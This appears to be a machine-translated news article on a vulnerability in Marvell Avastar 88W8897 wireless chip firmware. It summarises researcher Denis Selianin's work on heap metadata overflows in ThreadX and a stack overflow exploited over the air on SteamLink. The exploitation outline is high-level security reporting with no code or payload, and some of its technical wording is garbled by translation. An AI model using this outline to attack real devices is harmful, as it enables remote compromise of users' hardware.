Vulnerability in widely used Wi-Fi chip firmware
The security flaw in the Marvell Avastar 88W8897 SoC chip firmware, which is in the Bluetooth technologies, WiFi and NFC are used in PS4 devices, Microsoft Surface tablets and laptops, Xbox One devices, Samsung smartphones and Chromebooks, etc., has caused Access to the device’s temporary memory is possible for intruders. Marvel’s firmware is based on ThreadX operating system, which is a Real Time Operating System, and this operating system was developed by Express Logic. Once the RTOS license purchase fee is paid, it will be possible to access the source code of this firmware for further investigation, and this will lead to the discovery of defects and vulnerabilities on it. Also, the operating system company claims that ThreadX has been used more than 6 million times in IoT devices and is the most popular software used in connection with WiFi chips in the world.
Typically, setting up a WiFi chip and coordinating it It is done with the relevant launcher (Driver) when the device starts working, by loading its firmware. Marvell’s System On Chip wireless system works with some popular Linux bootloaders that interface directly with the Linux kernel; Such as: mwifiex whose source code is available in the official Linux repositories, mlan and mlinux whose source code is available in the steamlink-sdk repositories. Both cases provide the operating system with the ability to debug and read and write data in the temporary memory of the WiFi module.
One of the vulnerabilities reported in the firmware is related to the overflow of a part of the memory block when the chip is searching for WiFi networks; A process that will be done every 5 minutes, even if the device is already connected to a WiFi network, in which case knowing the name or password of WiFi networks is unimportant. Denis Selianin, a researcher at Embedi, which works in the field of security of IoT devices; He says that this in itself makes this vulnerability interesting; Because even before connecting to a WiFi network and during the scanning stage, it is possible to exploit this vulnerability. For this reason, it will be possible to run remote code execution on the Samsung Chromebook.
- WPA2 protocol confirmed to be vulnerable, hacking Wi-Fi is now possible
- Google releases update to fix WPA2 vulnerability in Android
- Learning to change Wi-Fi password
In this Report We see that Selianin is exploited in two ways It describes a vulnerability that one of them exists on any firmware under certain conditions ThreadX is done and the other can be done on the Marvel firmware, which can be said in general that the combination of these two methods will lead to reliable exploitation of this vulnerability. In general, it can be stated that the attacker will have the ability to control the pointer to the memory address, and by changing this value to a free block in the memory, he can change the execution process of the firmware. Selianin further says that by controlling the allocation location of the next block’s address in the memory, the attacker can point to a desired location in the memory that allows him to execute malicious codes.
Exploiting the vulnerability in Marvel’s Avastar SoC involves reverse engineering the data values in the target memory block, which for occupied blocks The next one will be possible. The functions used at the beginning of the ThreadX memory block each call a metadata header with a specific pointer before freeing the memory block. This information is enough to run malicious codes on the wireless SoC.
Another vulnerability that researchers have discovered is Stack Base buffer overflow, which is easier to exploit; Because, according to Selianin’s explanation, Marvel uses Linux kernel 3.8.13-mrvl, which is not hardwired to deal with exploits by binary exploit methods. The attacker does only two things to exploit the vulnerability, first he calls the v7_flush_kern_cache_louis function from the Linux kernel and then executes the desired shellcode! In the video below, we see the process of exploiting Marvell Avastar WiFi on Valve SteamLink, which exploits this vulnerability without any interaction with the user and is done automatically in over-the-air conditions. Selianin stated his motivation for releasing these vulnerabilities is that the devices that use these chips for wireless communication have not been sufficiently investigated by the cyber security community, and more in-depth investigations should be conducted on such devices by researchers.